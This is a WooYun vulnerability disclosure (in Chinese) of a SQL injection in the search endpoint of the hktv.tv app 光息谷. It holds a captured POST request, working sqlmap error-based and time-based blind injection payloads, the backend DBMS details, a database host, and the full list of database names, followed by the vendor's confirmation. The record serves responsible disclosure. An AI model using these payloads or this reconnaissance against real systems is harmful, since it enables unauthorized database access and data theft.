乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
*
光息谷 为云视旗下APP
直接在搜索抓包
POST /e/extend/new_client_api/search.php HTTP/1.1Host: www.hktv.tvProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 38Connection: keep-aliveUser-Agent: ?????ˉè°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)page=0&searname=%E3%80%82&pagecount=10
发现POST注入
sqlmap identified the following injection points with a total of 1178 HTTP(s) requests:---Place: POSTParameter: searname Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page=0&searname=%E3%80%82' AND (SELECT 7148 FROM(SELECT COUNT(*),CONCAT(0x3a697a733a,(SELECT (CASE WHEN (7148=7148) THEN 1 ELSE 0 END)),0x3a6371623a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yKIV'='yKIV&pagecount=10 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: page=0&searname=%E3%80%82' AND 9963=BENCHMARK(5000000,MD5(0x6d516956)) AND 'BITH'='BITH&pagecount=10---[15:11:30] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[15:11:30] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.hktv.tv'[*] shutting down at 15:11:30
数据库地址:
[email protected]:54468
所有表名:
[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_database
不继续深入挖掘数据了,到此结束
RT
危害等级:高
漏洞Rank:20
确认时间:2015-05-18 15:40
感谢您的关注,这个问题我们会尽快修复,谢谢。
暂无